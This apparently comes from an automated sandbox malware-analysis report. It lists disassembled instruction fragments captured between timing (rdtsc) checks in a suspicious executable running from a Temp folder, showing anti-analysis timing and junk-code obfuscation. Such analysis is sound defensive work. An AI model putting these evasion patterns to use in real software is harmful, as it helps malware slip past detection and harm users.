Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018763 second address: 1018794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3460CF0808h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F3460CF0801h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018BCF second address: 1018BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018BD9 second address: 1018BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1018BDD second address: 1018BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10192FC second address: 1019300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019300 second address: 101931C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3460BFB971h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101931C second address: 101933A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF07FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F3460CF07FEh 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F3460CF07F6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10194DD second address: 1019531 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3460BFB96Dh 0x00000008 pop edi 0x00000009 push edi 0x0000000a jmp 00007F3460BFB970h 0x0000000f jmp 00007F3460BFB973h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3460BFB976h 0x0000001e push esi 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019531 second address: 1019537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019537 second address: 1019541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019939 second address: 1019942 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1019942 second address: 1019948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101CC0C second address: 101CC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101CC10 second address: 101CC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3460BFB974h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101CC2C second address: 101CC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101D293 second address: 101D29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 101D29C second address: 101D2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0803h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push edi 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop edi 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F3460CF0808h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 js 00007F3460CF0802h 0x0000002c jng 00007F3460CF07FCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FEDAAC second address: FEDAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: FEDAB2 second address: FEDAB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024177 second address: 102417D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102417D second address: 10241A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10242ED second address: 10242F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F3460BFB966h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10242F9 second address: 1024335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F3460CF080Ah 0x0000000b jnp 00007F3460CF081Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3460CF0805h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10245ED second address: 1024634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3460BFB966h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F3460BFB96Dh 0x00000013 jmp 00007F3460BFB975h 0x00000018 jmp 00007F3460BFB970h 0x0000001d ja 00007F3460BFB966h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024A4A second address: 1024A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024A4F second address: 1024A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024A55 second address: 1024A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024A5B second address: 1024A5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1024C0D second address: 1024C35 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3460CF07F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F3460CF0809h 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F3460CF0801h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1028CFA second address: 1028D0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1028DF6 second address: 1028E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F3460CF07FCh 0x0000000c jne 00007F3460CF07F6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F3460CF07FEh 0x0000001c jnp 00007F3460CF07F6h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1028E22 second address: 1028E2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3460BFB96Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1029B5E second address: 1029B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3460CF07F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1029B69 second address: 1029B9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F3460BFB96Eh 0x00000011 mov esi, dword ptr [ebp+122D345Dh] 0x00000017 pop esi 0x00000018 xchg eax, ebx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1029B9A second address: 1029B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102C18B second address: 102C190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102C190 second address: 102C1BB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3460CF07F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F3460CF080Ch 0x00000015 jmp 00007F3460CF0806h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102E69F second address: 102E729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jbe 00007F3460BFB970h 0x0000000d pushad 0x0000000e jno 00007F3460BFB966h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F3460BFB968h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F3460BFB968h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D3504h] 0x00000054 mov esi, dword ptr [ebp+122D3718h] 0x0000005a push 00000000h 0x0000005c jmp 00007F3460BFB979h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F3460BFB96Ch 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102FD42 second address: 102FD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10338FF second address: 103392B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3460BFB968h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F3460BFB979h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1035E38 second address: 1035E57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3460CF0807h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1035E57 second address: 1035E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB96Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F3460BFB968h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102CA2F second address: 102CA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1035E71 second address: 1035E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 102D94B second address: 102D951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1037DE9 second address: 1037DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1037DEF second address: 1037DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1037DF3 second address: 1037DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1037E96 second address: 1037E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1030544 second address: 1030561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB979h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10326E0 second address: 10326EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3460CF07F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103B462 second address: 103B4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 or edi, dword ptr [ebp+122D35C0h] 0x0000000d push 00000000h 0x0000000f add dword ptr [ebp+1245F793h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F3460BFB968h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 and ebx, 5AD998E1h 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b jmp 00007F3460BFB973h 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103D935 second address: 103D93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103D93B second address: 103D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103D93F second address: 103D943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103D943 second address: 103D950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103D950 second address: 103D9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F3460CF07F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 add edi, dword ptr [ebp+122D1AB2h] 0x0000002b push 00000000h 0x0000002d and ebx, dword ptr [ebp+122D36B8h] 0x00000033 mov edi, esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F3460CF07F8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 mov bl, dh 0x00000053 xchg eax, esi 0x00000054 push edi 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103E8E7 second address: 103E8F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103E8F5 second address: 103E8FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103601A second address: 1036028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1038044 second address: 1038049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1033A7D second address: 1033A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1036028 second address: 1036032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F3460CF07F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1038049 second address: 1038053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1033A83 second address: 1033A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103DB4B second address: 103DBDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jns 00007F3460BFB966h 0x0000000d pop edx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edi, ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov bx, 7BE0h 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F3460BFB968h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D036Dh] 0x00000046 mov ebx, esi 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F3460BFB968h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 call 00007F3460BFB96Ah 0x00000069 mov bx, cx 0x0000006c pop edi 0x0000006d jl 00007F3460BFB96Ch 0x00000073 add dword ptr [ebp+122D339Fh], eax 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1038053 second address: 10380DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D1BD1h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F3460CF07F8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov bx, 1AA8h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f sub dword ptr [ebp+1245C109h], ebx 0x00000045 mov eax, dword ptr [ebp+122D01F9h] 0x0000004b mov dword ptr [ebp+122D1A3Fh], ecx 0x00000051 mov bx, dx 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push ebp 0x00000059 call 00007F3460CF07F8h 0x0000005e pop ebp 0x0000005f mov dword ptr [esp+04h], ebp 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc ebp 0x0000006c push ebp 0x0000006d ret 0x0000006e pop ebp 0x0000006f ret 0x00000070 or dword ptr [ebp+122D260Dh], edx 0x00000076 push eax 0x00000077 push edi 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1033A87 second address: 1033B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D1808h], esi 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F3460BFB968h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 and ebx, 3A0E88C4h 0x0000003d mov eax, dword ptr [ebp+122D0801h] 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F3460BFB968h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000016h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d jl 00007F3460BFB97Eh 0x00000063 jno 00007F3460BFB978h 0x00000069 jg 00007F3460BFB96Ch 0x0000006f push FFFFFFFFh 0x00000071 call 00007F3460BFB977h 0x00000076 mov ebx, dword ptr [ebp+1244F39Eh] 0x0000007c pop ebx 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F3460BFB96Dh 0x00000085 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103DBDD second address: 103DBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103DBE3 second address: 103DC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F3460BFB971h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 103DC04 second address: 103DC08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
